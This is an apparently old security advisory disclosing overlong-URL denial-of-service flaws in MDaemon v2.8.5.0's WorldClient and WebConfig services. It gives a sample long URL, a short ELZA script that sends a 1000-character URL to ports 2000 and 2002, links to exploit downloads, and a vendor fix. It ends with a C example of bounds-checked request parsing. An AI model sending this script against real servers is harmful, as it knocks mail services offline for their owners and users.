COMMAND
MDaemon
SYSTEMS AFFECTED
MDaemon v2.8.5.0
PROBLEM
UssrLabs found multiple places in MDaemon v2.8.5.0 where proper
bounds checking is not performed. Each of the following results
in a Denial of Service against the service in question. Affected
services:
WorldClient: Port 2000
WebConfig: Port 2002
Both of these remote services overflow if you send a large URL
name, like:
http://serverip/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
For the Binary / Source for this MDaemon Server v2.8.5.0 Denial
of Service go to:
http://www.ussrback.com/mdeam285/
Philip Stoev added the following. Recently, it occurred to him
that it is by no means necessary to compile a binary for every
such DoS, even if it cannot be performed with telnet or netcat.
So, he wrote a script language for automating HTTP requests. The
interpreter can be obtained from
http://phiphi.hypermart.net
This DoS would look like this written in ELZA:
var onerror = continue
subst SERVER ? 127.0.0.1
subst BIGURL > 1000
get url http://SERVER:2000/BIGURL
get url http://SERVER:2002/BIGURL
Below is the exploit source code by UssrLabs (MIME-encoded):
SOLUTION
A fix for all MDaemon/WorldClient Standard customers is available
here:
http://www.altn.com/Downloads/incoming/md285fix.zip
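The kind of bounds check whose absence the PROBLEM section describes, as an added example in C (not MDaemon's code, which this advisory does not show): a request-line parser that answers 414 instead of copying an oversized URL into a fixed buffer. The function name, the returned status codes and TARGET_MAX are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>

#define TARGET_MAX 256  /* assumed cap, not a value from the advisory */

/* Extract the request target from "METHOD SP target SP HTTP-version".
 * line need not be NUL-terminated; len is the number of bytes received.
 * Returns 200 on success, 400 if malformed, 414 if the target does not
 * fit in out. Never writes more than outsz bytes to out. */
int parse_request_target(const char *line, size_t len, char *out, size_t outsz)
{
    const char *end = line + len, *start, *stop;
    size_t tlen, i;

    if (outsz == 0)
        return 400;
    out[0] = '\0';
    start = memchr(line, ' ', len);
    if (start == NULL || start == line)
        return 400;                       /* missing method */
    start++;
    stop = memchr(start, ' ', (size_t)(end - start));
    /* No second space: the read buffer may have filled mid-URL. */
    tlen = (size_t)((stop ? stop : end) - start);
    if (tlen >= outsz)
        return 414;                       /* length checked before any copy */
    if (stop == NULL || tlen == 0)
        return 400;
    for (i = 0; i < tlen; i++)            /* reject NUL and control bytes */
        if ((unsigned char)start[i] < 0x21 || start[i] == 0x7f)
            return 400;
    memcpy(out, start, tlen);
    out[tlen] = '\0';
    return 200;
}

int main(void)
{
    char target[TARGET_MAX], req[1100];
    const char *ok = "GET /index.html HTTP/1.0";   /* constructed samples */

    memcpy(req, "GET /", 5);
    memset(req + 5, 'a', 1000);                    /* 1001-byte target */
    memcpy(req + 1005, " HTTP/1.0", 9);
    printf("%d\n", parse_request_target(ok, strlen(ok), target, sizeof target));
    printf("%d\n", parse_request_target(req, 1014, target, sizeof target));
    return 0;
}
```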